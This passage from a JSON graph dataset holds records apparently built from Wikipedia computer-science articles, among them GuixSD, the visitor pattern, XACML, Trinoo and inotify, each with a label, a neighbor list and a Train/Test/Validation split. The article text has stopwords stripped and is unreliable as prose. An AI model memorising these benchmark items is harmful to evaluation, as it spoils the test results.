mta system system governed via shepherd daemon represent user space directed acyclic graph system-service − responsible early phases boot init − root subsequently initialised services extensions system-service functionality either directly transitively services written configured guile scheme gnu shepherd intended highly programmable system administrator also used manage per-user profiles unprivileged daemons services services configuration stored uniformly object-oriented scheme code core set services provided basic guix system distribution arbitrary new services flexibly declared guile object system goops existing services redefined user discretion asking shepherd dynamically rewrite services specified ways instantiation gnu shepherd originally designed work gnu hurd later adopted guixsd guixsd date unstable development git repository shared guix enables users organizations set stable release channels via channel-feature packages guix generally up-to-date thanks lack package maintainer bottleneck anyone contribute update subject community approval process assisted tools guix refresh changes git repository peer-reviewed community members committed one 45 people commit access practice sometimes builds cause system breakages users typo similar error often solved within minutes way guix pull operates means users retain working system meantime system update leave users broken system users easily roll back individual packages well whole system state means stable channel common linux distributions longer needed users willing report bug wait minutes trying update via guix pull gnu project announced november 2012 first release gnu guix functional package manager based nix provides among things guile scheme apis project started june 2012 ludovic courtès one gnu guile hackers august 20 2015 announced guix ported gnu hurd project fixed release schedule released approximately every 6 months jesse smith distrowatch weekly reviewed guixsd 0.15.0 said guixsd package manager like criticized limited hardware support limited documentation",
    "neighbors": [
      2050,
      1028,
      10760,
      7181,
      8213,
      6680,
      9245,
      3618,
      5155,
      9253,
      5670,
      11305,
      7722,
      5165,
      5677,
      56,
      59,
      3131,
      3649,
      4673,
      8258,
      10817,
      10822,
      5703,
      3667,
      6227,
      1110,
      1112,
      3674,
      3685,
      9324,
      10860,
      2671,
      8304,
      1138,
      2168,
      11388,
      7293,
      5759,
      2180,
      8837,
      4230,
      9865,
      6797,
      10900,
      10394,
      3744,
      673,
      3745,
      4775,
      4265,
      6828,
      7854,
      2738,
      4790,
      2233,
      5819,
      190,
      5833,
      8907,
      4302,
      2259,
      6361,
      8413,
      7904,
      10464,
      741,
      231,
      2281,
      3817,
      4841,
      6890,
      7913,
      7920,
      5363,
      8436,
      9461,
      6393,
      8957,
      2304,
      5380,
      11525,
      2310,
      7435,
      7947,
      9487,
      2321,
      788,
      1813,
      5397,
      4887,
      2332,
      8476,
      10012,
      10016,
      802,
      10530,
      6446,
      1842,
      6962,
      823,
      2872,
      3903,
      2375,
      3918,
      4951,
      9564,
      11613,
      2401,
      2914,
      1379,
      10083,
      9063,
      9064,
      8554,
      9579,
      7020,
      7534,
      10096,
      2417,
      1394,
      9074,
      8068,
      3462,
      8582,
      11654,
      2955,
      4493,
      10127,
      2448,
      1939,
      10145,
      10149,
      11180,
      5555,
      439,
      6583,
      9148,
      10172,
      9151,
      10687,
      8644,
      4039,
      9671,
      5578,
      5067,
      5070,
      463,
      4561,
      8147,
      9693,
      9696,
      8673,
      7140,
      485,
      1509,
      6119,
      5096,
      5612,
      1007,
      8177,
      1522,
      3573,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 2011,
    "label": 9,
    "text": "Visitor_pattern:visitor pattern object-oriented programming software engineering visitor design pattern way separating algorithm object structure operates practical result separation ability add new operations existing object structures without modifying structures one way follow open/closed principle essence visitor allows adding new virtual functions family classes without modifying classes instead visitor class created implements appropriate specializations virtual function visitor takes instance reference input implements goal double dispatch visitor design pattern one twenty-three well-known gof design patterns describe solve recurring design problems design flexible reusable object-oriented software objects easier implement change test reuse problems visitor design pattern solve new operations needed frequently object structure consists many unrelated classes inflexible add new subclasses time new operation required .. distributing operations across various node classes leads system hard understand maintain change solution visitor design pattern describe makes possible create new operations independently classes object structure adding new visitor objects see also uml class sequence diagram gang four defines visitor nature visitor makes ideal pattern plug public apis thus allowing clients perform operations class using visiting class without modify source moving operations visitor classes beneficial drawback pattern however makes extensions class hierarchy difficult new classes typically require new codice_1 method added visitor consider design 2d computer-aided design cad system core several types represent basic geometric shapes like circles lines arcs entities ordered layers top type hierarchy drawing simply list layers plus added properties fundamental operation type hierarchy saving drawing system native file format first glance may seem acceptable add local save methods types hierarchy also useful able save drawings file formats adding ever methods saving many different file formats soon clutters relatively pure original geometric data structure naive way solve would maintain separate functions file format save function would take drawing input traverse encode specific file format done added different format duplication functions accumulates example saving circle shape raster format requires similar code matter specific raster form used different primitive shapes case primitive shapes like lines polygons similar thus code becomes large outer loop traversing objects large decision tree inside loop querying type object another problem approach easy miss shape one savers new primitive shape introduced save routine implemented one file type others leading code extension maintenance problems instead visitor pattern applied encodes logical operation whole hierarchy one class containing one method per type cad example save function would implemented separate visitor subclass would remove duplication type checks traversal steps would also make compiler complain shape omitted another motive reuse iteration code example iterating directory structure could implemented visitor pattern would allow creating file searches file backups directory removal etc. implementing visitor function reusing iteration code uml class diagram codice_2 class n't implement new operation directly instead codice_2 implements dispatching operation codice_4 dispatches delegates request accepted visitor object codice_5 codice_6 class implements operation codice_7 br codice_8 implements codice_4 dispatching codice_10 codice_6 class implements operation codice_12 uml sequence diagram shows run-time interactions codice_13 object traverses elements object structure codice_14 calls codice_4 element br first codice_13 calls codice_4 codice_2 calls codice_19 accepted codice_20 object element codice_21 passed codice_20 visit codice_2 call codice_24 br thereafter codice_13 calls codice_4 codice_8 calls codice_28 codice_20 visits codice_8 calls codice_31 visitor pattern requires programming language supports single dispatch common object-oriented languages c++ java smalltalk objective-c swift javascript python c condition consider two objects class type one termed element visitor visitor declares codice_1 method takes element argument class element concrete visitors derived visitor class implement codice_1 methods implements part algorithm operating object structure state algorithm maintained locally concrete visitor class element declares codice_34 method accept visitor taking visitor argument concrete elements derived element class implement codice_34 method simplest form call visitor ’ codice_1 method composite elements maintain list child objects typically iterate calling child ’ codice_34 method client creates object structure directly indirectly instantiates concrete visitors operation performed implemented using visitor pattern calls codice_34 method top-level element codice_34 method called program implementation chosen based dynamic type element static type visitor associated codice_1 method called implementation chosen based dynamic type visitor static type element known within implementation codice_34 method dynamic type element bonus visitor ca n't handle argument given element type compiler catch error thus implementation codice_1 method chosen based dynamic type element dynamic type visitor effectively implements double dispatch languages whose object systems support multiple dispatch single dispatch common lisp c via dynamic language runtime dlr implementation visitor pattern greatly simplified a.k.a dynamic visitor allowing use simple function overloading cover cases visited dynamic visitor provided operates public data conforms open/closed principle since modify extant structures single responsibility principle since implements visitor pattern separate component way one algorithm written traverse graph elements many different kinds operations performed traversal supplying different kinds visitors interact elements based dynamic types elements visitors example shows print tree representing numeric expression involving literals addition example presented using classic dynamic language runtime implementations classic visitor print operations type implemented one expressionprinter class number overloads visit method namespace wikipedia example declares separate codice_43 class takes care printing expression classes must expose members make possible namespace wikipedia case object responsibility know print stream visitor object stream syntax creating class classes created sending messages classes writestream subclass expressionprinter expressionprinter » write anobject object subclass expression expression subclass literal literal class » avalue literal » value avalue literal » puton astream expression subclass addition addition class » left right b addition » left anexpression addition » right anexpression addition » puton astream object subclass program program » main class abstractdispatcher // forward declare abstractdispatcher class file // parent class elements archivedfile splitfile // forward declare specific elements files dispatched class archivedfile class splitfile class extractedfile class abstractdispatcher // declares interface dispatcher class archivedfile public file // specific element class 1 class splitfile public file // specific element class 2 class extractedfile public file // specific element class 3 class dispatcher public abstractdispatcher // implements dispatching int main package visitor2 import fmt type visitor interface type element interface type wheel struct func self *wheel accept visitor visitor string func self *wheel getname string func self *engine accept visitor visitor string func self *body accept visitor visitor string type car struct func self *car accept visitor visitor string func self *visitcar visit element element string package visitor import func testvistor *testing.t visiting engine visiting body visiting front left wheel visiting front right wheel visiting back left wheel visiting back right wheel following example language java shows contents tree nodes case describing components car printed instead creating codice_44 methods node subclass codice_45 codice_46 codice_47 codice_48 one visitor class codice_49 performs required printing action different node subclasses require slightly different actions print properly codice_49 dispatches actions based class argument passed codice_1 method codice_52 analogous save operation different file format likewise import java.util.list interface carelement interface carelementvisitor class wheel implements carelement class body implements carelement class engine implements carelement class car implements carelement class carelementdovisitor implements carelementvisitor class carelementprintvisitor implements carelementvisitor public class visitordemo flexible approach pattern create wrapper class implementing interface defining accept method wrapper contains reference pointing codice_53 could initialized constructor approach avoids implement interface element see article java tip 98 article elements initarg elements defmethod do-something object other-object defmethod do-something object wheel other-object integer defmethod do-something object wheel other-object symbol let make-instance 'auto codice_54 parameter superfluous codice_55 reason possible use anonymous function calls desired target method lexically captured object defmethod traverse function auto other-object removed multiple dispatch occurs call issued body anonymous function codice_55 mapping function distributes function application elements object thus traces visitor pattern disappear except mapping function evidence two objects involved knowledge two objects dispatch types lambda function python support method overloading visit methods different model types need different names visitor pattern example abc import abcmeta abstractmethod not_implemented implement class carelement class body carelement class engine carelement class wheel carelement class car carelement class carelementvisitor class carelementdovisitor carelementvisitor class carelementprintvisitor carelementvisitor car car car.accept carelementprintvisitor car.accept carelementdovisitor visiting front left wheel visiting front right wheel visiting back left wheel visiting back right wheel visiting body visiting engine visiting car kicking front left wheel kicking front right wheel kicking back left wheel kicking back right wheel moving body starting engine starting car one using python 3 make general implementation accept method class visitable one could extend iterate class method resolution order would like fall back already-implemented classes could also use subclass hook feature define lookup advance",
    "neighbors": [
      1280,
      3076,
      3462,
      4231,
      7175,
      5257,
      9225,
      4107,
      5772,
      2062,
      9875,
      3733,
      3990,
      2456,
      5537,
      8100,
      5677,
      2222,
      8251,
      8640,
      8262,
      333,
      11343,
      7292,
      337,
      4817,
      10581,
      734,
      8928,
      8929,
      4194,
      10470,
      8554,
      5357,
      1142,
      10617,
      2556
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2012,
    "label": 3,
    "text": "Self-stabilization:self-stabilization self-stabilization concept fault-tolerance distributed computing distributed system self-stabilizing end correct state matter state initialized correct state reached finite number execution steps first glance guarantee self stabilization may seem less promising traditional fault-tolerance algorithms aim guarantee system always remains correct state certain kinds state transitions however traditional fault tolerance always achieved example achieved system started incorrect state corrupted intruder moreover complexity hard debug analyze distributed systems hence hard prevent distributed system reaching incorrect state indeed forms self-stabilization incorporated many modern computer telecommunications networks since gives ability cope faults foreseen design algorithm many years seminal paper edsger dijkstra 1974 concept remains important presents important foundation self-managing computer systems fault-tolerant systems result dijkstra paper received 2002 acm podc influential-paper award one highest recognitions distributed computing community moreover dijkstra death award renamed called dijkstra award e.w dijkstra 1974 presented concept self-stabilization prompting research area demonstration involved presentation self-stabilizing mutual exclusion algorithms also showed first self-stabilizing algorithms rely strong assumptions system previous protocols used practice actually stabilize assuming existence clock global system assuming known upper bound duration system transition ten years later leslie lamport pointed importance dijkstra work 1983 conference called symposium principles distributed computing researchers directed attention elegant fault-tolerance concept talk lamport stated regard dijkstra brilliant work least brilliant published paper almost completely unknown regard milestone work fault tolerance ... regard self-stabilization important concept fault tolerance fertile field research.afterwards dijkstra work awarded acm-popdc influential paper award became acm association computing machinery dijkstra prize distributed computing given annual acm-popdc symposium distributed algorithm self-stabilizing starting arbitrary state guaranteed converge legitimate state remain legitimate set states thereafter state legitimate starting state algorithm satisfies specification property self-stabilization enables distributed algorithm recover transient fault regardless nature moreover self-stabilizing algorithm initialized eventually starts behave correctly regardless initial state dijkstra paper introduces concept self-stabilization presents example context token ring — network computers ordered circle computer processor see whole state one processor immediately precedes state may imply processor token token one requirements exactly one must hold token given time second requirement prescribes node passes token computer/processor succeeding token eventually circulates ring first self-stabilizing algorithms detect errors explicitly order subsequently repair instead constantly pushed system towards legitimate state since traditional methods detecting error often difficult time-consuming behavior considered desirable method described paper cited collects huge amount information whole network one place attempts determine whether collected global state correct even determination alone hard task recently researchers presented newer methods light-weight error detection self-stabilizing systems using local checking term local refers part computer network local detection used computer network required communicate entire network order detect error — error detected computer communicate nearest neighbors local detection methods simplified task designing self-stabilizing algorithms considerably error detection mechanism recovery mechanism designed separately newer algorithms based detection methods also turned much efficient moreover papers suggested rather efficient general transformers transform non self stabilizing algorithms become self stabilizing idea combination 4 parts self stabilizing initial self stabilizing protocols also presented papers efficient reset protocols presented later e.g additional efficiency introduced notion time-adaptive protocols idea behind small number errors occurs recovery time made short dijkstra original self-stabilization algorithms property useful property self-stabilizing algorithms composed layers layers exhibit circular dependencies stabilization time composition bounded sum individual stabilization times layer new approaches dijkstra work emerged later case krzysztof apt ehsan shoja proposition demonstrated self-stabilization naturally formulated using standard concepts strategic games particularly concept improvement path particular work sought demonstrate link self-stabilization game theory time complexity self-stabilizing algorithm measured asynchronous rounds cycles measure output stabilization time subset state variables defined externally visible output certain states outputs defined correct legitimate set outputs components system said stabilized time starts correct provided stays correct indefinitely unless additional faults occur output stabilization time time number asynchronous rounds output stabilizes system self-stabilizing system said randomized self-stabilizing self-stabilizing expected number rounds needed reach correct state bounded constant formula_1 design self-stabilization above-mentioned sense well known difficult job fact class distributed algorithms property local checking legitimacy network state evaluated single process obvious case dijkstra token-ring defined process detect whether network state legitimate case one token present non-neighboring processes suggests self-stabilization distributed system sort collective intelligence component taking local actions based local knowledge eventually guarantees global convergence end help overcome difficulty designing self-stabilization defined types stabilization devised instance weak stabilization property distributed system possibility reach legitimate behavior every possible state weak stabilization easier design guarantees possibility convergence runs distributed system rather convergence every run self-stabilizing algorithm silent converges global state values communication registers used algorithm remain fixed extension concept self-stabilization superstabilization intent cope dynamic distributed systems undergo topological changes classical self-stabilization theory arbitrary changes viewed errors guarantees given system stabilized superstabilizing systems passage predicate always satisfied system topology reconfigured",
    "neighbors": [
      6403,
      9224,
      4201,
      3529,
      1610,
      2283,
      9677,
      9294,
      11242,
      5040,
      5585,
      11625,
      4947,
      6871,
      6652,
      3774,
      7775
    ],
    "mask": "Test"
  },
  {
    "node_id": 2013,
    "label": 4,
    "text": "XACML:xacml xacml stands extensible access control markup language standard defines declarative fine-grained attribute-based access control policy language architecture processing model describing evaluate access requests according rules defined policies published standard specification one goals xacml promote common terminology interoperability access control implementations multiple vendors xacml primarily attribute-based access control system abac attributes bits data associated user action resource inputs decision whether given user may access given resource particular way role-based access control rbac also implemented xacml specialization abac xacml model supports encourages separation access decision point use access decisions baked client applications based local machine userids access control lists acls difficult update decision criteria governing policy changes client decoupled access decision authorization policies updated fly affect clients immediately version 1.0 ratified oasis standards organization 2003 version 2.0 ratified oasis standards organization february 1 2005 first committee specification xacml 3.0 released august 10 2010 latest version xacml 3.0 standardized january 2013 non-normative terminology following rfc 2904 except pap xacml structured 3 levels elements policy set contain number policy elements policy set elements policy contain number rule elements policies policy sets rules requests use subjects resources environments actions xacml provides target basically set simplified conditions subject resource action must met policy set policy rule apply given request policy policy set found apply given request rules evaluated determine access decision response addition way check applicability target information also provides way index policies useful need store many policies quickly sift find ones apply request access service arrives pdp know look policies might apply request policies indexed based target constraints note target may also specify applies request policy set policy rule contain target elements conditions exist rules conditions essentially advanced form target use broader range functions importantly used compare two attributes together e.g subject-id==doctor-id conditions possible implement segregation duty checks relationship-based access control within xacml concept called obligations used obligation directive policy decision point pdp policy enforcement point pep must carried access approved pep unable comply directive approved access may must realized augmentation obligations eliminates gap formal requirements policy enforcement example obligation could look like access control rule xacml obligation effective way meet formal requirements non-repudiation example hard implement access control rules furthermore formal requirements part access control policy obligations separate functions makes policies consistent centralization environment easier achieve happens xacml two rules policies contradict imagine instance first rule would say managers view documents second rule would say one work 9am request alice trying view document 8am rule wins combining algorithms tell us help resolve conflicts xacml defines number combining algorithms identified rulecombiningalgid policycombiningalgid attribute policy policyset elements respectively rule-combining algorithm defines procedure arriving access decision given individual results evaluation set rules similarly policy-combining algorithm defines procedure arriving access decision given individual results evaluation set policies list higher order functions listed formal definition refer xacml standard http //docs.oasis-open.org/xacml/3.0/xacml-core-v3-schema-wd-17.xsd xacml 3.0 introduces administrative delegation json profile xacml request/response rest profile xacml multiple decision profile xacml many implementation delegation new xacml 3.0 delegation mechanism used support decentralized administration access policies allows authority delegator delegate parts authority someone else authority another user delegate without need involve modification root policy delegation model delegation rights separated access rights instead referred administrative control policies access control administrative policies work together following scenario partnership companies many services protected access control system system implements following central rules protect resources allow delegation access control rules administration control rules consultant enters corporation delegation issued locally consultant supervisor authorizing consultant access systems directly delegator supervisor scenario may right delegate limited set access rights consultants new features xacml 3.0 listed http //www.webfarmr.eu/2010/07/enhancements-and-new-features-in-xacml-3-axiomatics/ xacml tc also publishing list changes http //wiki.oasis-open.org/xacml/differencesbetweenxacml2.0andxacml3.0 rule implements use-it-lose-it access control paradigm user log 30 days lose access pseudo-code deny currentdatetime lastlogin 30 days rule grants access current time greater 9am less 5pm following contains obligation block obligations statements returned along decision enrich decision flow example pep must log access granted 2013 2014 xacml technical committee focused designing new profiles facilitate developer integration include three profiles showcased cloud identity summit 2014 monterey california using profiles integrating fine-grained authorization applications becomes much easier json profile xacml simplifies integration pep pdp saml identity sso federation standard used authentication saml used common identity token format different applications saml xacml defined oasis saml xacml designed interoperate saml used carry identity information virtual identities xacml used drive access control logic policies oauth 2.0 considered authorization standard differs xacml though origin purpose applications oauth xacml handle user approval delegated access password management xacml simply provides xacml oauth combined together deliver comprehensive approach authorization",
    "neighbors": [
      9345,
      130,
      2818,
      8203,
      7320,
      6811,
      7198,
      2725,
      425,
      2737,
      5812,
      5303,
      11588,
      2501,
      5573,
      7878,
      7368,
      1097,
      8262,
      10829,
      210,
      10580,
      6750,
      479,
      11625,
      6381,
      4979
    ],
    "mask": "Test"
  },
  {
    "node_id": 2014,
    "label": 4,
    "text": "Isyvmon:isyvmon isyvmon computer system network monitoring software application system created it-cube systems designed monitor track status various applications network services servers network hardware isyvmon based open source software nagios centreon licensed gnu gpl v3 special features development isyvmon „ full discovery anh “ freeware enterprise edition auto discovery adi also available freeware edition introduced connection splunk www.splunk.com isyvmon isyvmon first world open public release isyvmon first official release idea isyvmon born introduced based 2007 created standardized toolkit evaluated relevant available monitoring tools nagios interface handling unhandy",
    "neighbors": [
      1211,
      5612,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2015,
    "label": 6,
    "text": "Execute_in_place:execute place computer science execute place xip method executing programs directly long term storage rather copying ram extension using shared memory reduce total amount memory required general effect program text consumes writable memory saving dynamic data instances program run single copy work several criteria met storage requirements usually met using flash memory addressed individual words read operations although bit slower normal system ram setups typically first stage boot loader xip program linked run address flash chip mapped power-up contains minimal program set system ram depends components used individual boards generalized enough proper sequence could embedded processor hardware loads second stage bootloader os kernel ram initialization writable memory may available computations performed within processor registers reason first stage boot loaders tend written assembler language minimum provide normal execution environment next program processors either embed small amount sram chip allow using onboard cache memory ram make first stage boot loader easier write using high-level language kernel bootloader address space generally assigned internally order use xip sufficient instruct linker place unmodifiable modifiable data different address ranges provide mechanism modifiable data copied writable memory code run assumes data accessed normally done part previous stage within small code segment beginning program address space assigned externally application program run system provide virtual memory compiler needs access modifiable data adding offset pointer private copy data area case external loader responsible setting instance specific memory areas xip places requirements file systems often difficult meet systems without page table entire file must stored within consecutive bytes must fragmented flash based file systems often aim distribute data sectors flash chip least erase cycles even wear chip prolonging lifetime complications speed tradeoff mean xip generally used first stage bootloaders memory extremely short supply relatively new file system linux called axfs advanced xip file system aims overcome shortcomings associated xip especially regard in-place execution user-space applications makes instance possible split executable binary file xip regions thus avoiding restriction fragmentation mentioned netbsd implementation also development",
    "neighbors": [
      5120,
      6664,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      5661,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      178,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      1776,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      11539,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7039,
      7554,
      8075,
      11675,
      11676,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      5598,
      2015,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 2016,
    "label": 8,
    "text": "Hypervideo:hypervideo hypervideo hyperlinked video displayed video stream contains embedded interactive anchors allowing navigation video hypermedia elements hypervideo thus analogous hypertext allows reader click word one document retrieve information another document another place document hypervideo combines video non-linear information structure allowing user make choices based content video user interests crucial difference hypervideo hypertext element time text normally static video necessarily dynamic content video changes time consequently hypervideo different technical aesthetics rhetorical requirements static hypertext page example hypervideo might involve creation link object video visible certain duration therefore necessary segment video appropriately add metadata required link frames—or even objects—in video pertinent information media forms kinoautomat 1967 world first interactive movie modern hypervideo systems implements core concepts movie non linear narrative interactivity video-to-video linking demonstrated interactive cinema group mit media lab elastic charles hypermedia journal developed 1988 1989 annotations called micons placed inside video indicating links content implementing interactive kon-tiki museum listol used order represent video footnotes video footnotes deliberate extension literary footnote applied annotating video thereby providing continuity traditional text early hypervideo 1993 hirata et al considered media based navigation hypermedia systems type media used query media retrieved example part image defined shape color example could link related image approach content video becomes basis forming links related content hotvideo implementation kind hypervideo developed ibm china research laboratory 1996 navigation associated resources accomplished clicking dynamic object video 1997 project mit media lab object-based media group called hypersoap developed concept short soap opera program viewer could click enhanced remote control objects video find information could purchased company watchpoint media formed order commercialize technology involved resulting product called storyteller oriented towards interactive television illustrating progression hypervideo hypertext storyspace hypertext writing environment employs spatial metaphor displaying links utilizes 'writing spaces generic containers content link writing spaces 1996 hypercafe popular experimental prototype hypervideo made use tool create narrative video spaces developed early model hypervideo system placing users virtual cafe user dynamically interacts video follow different conversations 1997 israeli software firm ephyx technologies released product called v-active one first commercial object based authoring system hypervideo technology success though ephyx changed name veon 1999 time shifted focus away hypervideo provision development tools web broadband content.. eline technologies founded 1999 developed hypervideo solutions called videoclix today videoclix used saas software service solution distribute monetize clickable video web mobile devices advantage videos play back popular video players quicktime flash well multiple online video platforms brightcove theplatform ooyala videoclix also offers technology integrated 3rd party players based quicktime flash mpeg-4 html5 first steps hypervideo taken late 1980s would appear hypervideo taking unexpectedly long realize potential many experiments hypercafe hypersoap extensively followed authoring tools moment available small number providers amount video content increases becomes available possibilities linking video increase even faster digital libraries constantly growing video important part news outlets amassed vast video archives could useful education historical research direct searching pictures videos much harder task indexing searching text could greatly facilitated hypervideo methods hypervideo challenging compared hyperlinked text due unique difficulty video presents node segmentation separating video algorithmically identifiable linkable content video basic time sequence images turn simply two dimensional arrays color information order segment video meaningful pieces objects images scenes within videos necessary provide context space time extract meaningful elements image sequence humans naturally able perform task desirable algorithmically developing method achieve however complex problem ntsc frame rate 30 frames per second even short video 30 seconds comprises 900 frames identification distinct video elements would tedious human intervention required every frame moderate amounts video material manual segmentation clearly unrealistic standpoint time smallest unit video single frame node segmentation could performed frame level—a straightforward task frame easily identifiable however single frame contain video information since videos necessarily dynamic analogously single word separated text convey meaning thus necessary consider scene next level temporal organization scene defined minimum sequential set frames conveys meaning important concept hypervideo one might wish hypervideo link active throughout one scene though next scene granularity therefore natural creation hypervideo consequently hypervideo requires algorithms capable detecting scene transitions one imagine coarser levels temporal organization scenes grouped together form narrative sequence turn grouped form video point view node segmentation however concepts critical even frame smallest time unit one still spatially segment video sub-frame level separating frame image constituent objects necessary performing node segmentation object level time introduces complexity case also even object differentiated one frame usually necessary follow object sequence frames process known object tracking essential creation links objects videos spatial segmentation object achieved example use intensity gradients detect edges color histograms match regions motion detection combination methods required nodes segmented combined associated linking information metadata must incorporated original video playback metadata placed conceptually layers tracks top video layered structure presented user viewing interaction thus display technology hypervideo player neglected creating hypervideo content example efficiency gained storing geometry areas associated tracked objects certain keyframes allowing player interpolate keyframes developed hotvideo furthermore creators videoclix emphasize fact content plays back standard players quicktime flash one considers flash player alone installed 98 internet-enabled desktops mature markets perhaps reason success product current arena user replies video content traditionally form text image links embedded playback sequence video allowed video hosting services viddler become embedded within imagery video within portions playback via selected time lengths inside progress slider element feature become known video comments audio comments perhaps significant consequence hypervideo result commercial advertising devising business model monetize video proven notoriously difficult application traditional advertising methods—for example introducing ads video—is likely rejected online community revenue selling advertising video sharing sites far promising hypervideo offers alternate way monetize video allowing possibility creating video clips objects link advertising e-commerce sites provide information particular products new model advertising less intrusive displaying advertising information user makes choice clicking object video since user requested product information type advertising better targeted likely effective",
    "neighbors": [
      2945,
      5641,
      3323,
      3571,
      5012,
      119,
      1944,
      7673,
      1723,
      5724,
      4797,
      7710
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2017,
    "label": 1,
    "text": "AlgaeBase:algaebase algaebase global species database information groups algae well one group flowering plants sea-grasses algaebase evolved michael guiry seaweed website grown database algae throughout world freshwater terrestrial brackish well marine habitats 2005 database contained 65,000 names september 2006 122,240 species infraspecific names database 5,826 images 38,290 bibliographic items 138,706 distributional records currently data marine algae particularly seaweeds complete 30,000 species algae included rhodophyta 6000 species marine chlorophyta 1500 species phaeophyceae 1755 species complete diatoms smaller freshwater green algae currently august 2010 incomplete groups programming carried visualid http //www.visualid.com pier kuipers caoilte guiry compilation data funded irish government department education science prtli 3 4 programmes http //www.hea.ie/en/prtli",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2018,
    "label": 4,
    "text": "Trinoo:trinoo trinoo trin00 set computer programs conduct ddos attack believed trinoo networks set thousands systems internet compromised remote buffer overrun exploits first suspected trinoo attacks described cert incident note 99-04 trinoo network connected february 2000 distributed denial service attack yahoo website trinoo famous allowing attackers leave message folder called cry_baby file self replicating modified regular basis long port 80 active trinoo authored teenager new orleans went alias phifli attacker using compromised host compiles list machines compromised process done automatically compromised host host stores mount information including find hosts compromise soon list machines compromised compiled scripts run compromise convert trinoo masters daemons one master control multiple daemons daemons compromised hosts launch actual udp floods victim machine ddos attack launched attacker issues command master hosts masters instruct every daemon start dos attack ip address specified command many doss comprise ddos attack",
    "neighbors": [
      9569,
      9282,
      10852,
      2409,
      7337,
      6347,
      2060,
      1965,
      4558,
      7983,
      9727,
      4883,
      8627,
      823,
      7515,
      2045,
      7102,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2019,
    "label": 3,
    "text": "Interrupt_vector_table:interrupt vector table interrupt vector table ivt data structure associates list interrupt handlers list interrupt requests table interrupt vectors entry interrupt vector table called interrupt vector address interrupt handler concept common across processor architectures ivts may implemented architecture-specific fashions example dispatch table one method implementing interrupt vector table processors interrupt vector table including chips intel amd infineon microchip atmel nxp etc interrupt vector table used three popular methods finding starting address interrupt service routine predefined method loads program counter pc directly address entry inside interrupt vector table jump table contains executable code principle extremely short interrupt handler could stored entirely inside interrupt vector table practice code entry single jump instruction jumps full interrupt service routine isr interrupt intel 8080 atmel avr 8051 microchip microcontrollers use predefined approach fetch method loads pc indirectly using address entry inside interrupt vector table pull address table loading pc address every entry ivt address interrupt service routine motorola/freescale microcontrollers use fetch method interrupt acknowledge method external device gives cpu interrupt handler number interrupt acknowledge method used intel pentium many older microprocessors cpu affected interrupt looks interrupt handler interrupt vector table transfers control",
    "neighbors": [
      5312,
      4773,
      7269,
      9599,
      3272,
      1515,
      9739,
      5457,
      5823
    ],
    "mask": "None"
  },
  {
    "node_id": 2020,
    "label": 4,
    "text": "Exit_control_lock:exit control lock exit control lock also known exit control device exit lock simply exit control prevents deters unauthorized exit exit control locks often used retail establishments deter shoplifting also used airports controlled areas people held clear customs quarantine stations exit control locks also used libraries one well-staffed entrance exit number exits intended emergency use exit control devices often used hospitals interfaced wireless sensors worn newborn children exits lock baby stolen one hospital rooms often shops make exit emergency use deter shoplifting usually door locked emergency exit button next pushing emergency exit button unlock door set shop fire alarm deters shoplifting person unlocks door order take item building emergency may reported police cctv footage available many exit control locks based magnetic locks one type delayed egress magnetic locks allow door open immediately allows guard get door door opens also release fire alarm power failure otherwise locks hold exit doors shut units common alzheimer units exit control systems include request exit detector pushbutton opens exit exit requests enabled facilities entrances well exits require authentication swiping otherwise reading card card reader intruder slips entrance controls building able detained questioning",
    "neighbors": [
      1272
    ],
    "mask": "Train"
  },
  {
    "node_id": 2021,
    "label": 2,
    "text": "Inotify:inotify inotify inode notify linux kernel subsystem acts extend filesystems notice changes filesystem report changes applications replaces earlier facility dnotify similar goals inotify created john mccutchan merged linux kernel mainline kernel version 2.6.13 released august 29 2005 later kernel versions included improvements required library interfaces added gnu c library glibc version 2.4 released march 2006 support inotify completed glibc version 2.5 released september 2006 one major use desktop search utilities like beagle functionality permits reindexing changed files without scanning filesystem changes every minutes would inefficient inotify also used automatically update directory views reload configuration files log changes backup synchronize upload limitations imposed inotify include following number advantages using inotify compared older dnotify api replaced dnotify program use one file descriptor directory monitoring become bottleneck since limit file descriptors per process could reached later fanotify created overcome issue use file descriptors along dnotify also proved problem using removable media devices could unmounted since file descriptors kept resource busy another drawback dnotify level granularity since programmers monitor changes directory level access detailed information environmental changes occur notification message sent stat structure must used considered necessary evil cache stat structures maintained every new stat structure generated comparison run cached one inotify api uses fewer file descriptors allowing programmers use established select poll interface rather signal notification system used dnotify also makes integration existing select- poll-based libraries like glib easier",
    "neighbors": [
      4616,
      3082,
      8721,
      5139,
      10780,
      11293,
      10785,
      3618,
      6180,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      8298,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      9872,
      2195,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      2974,
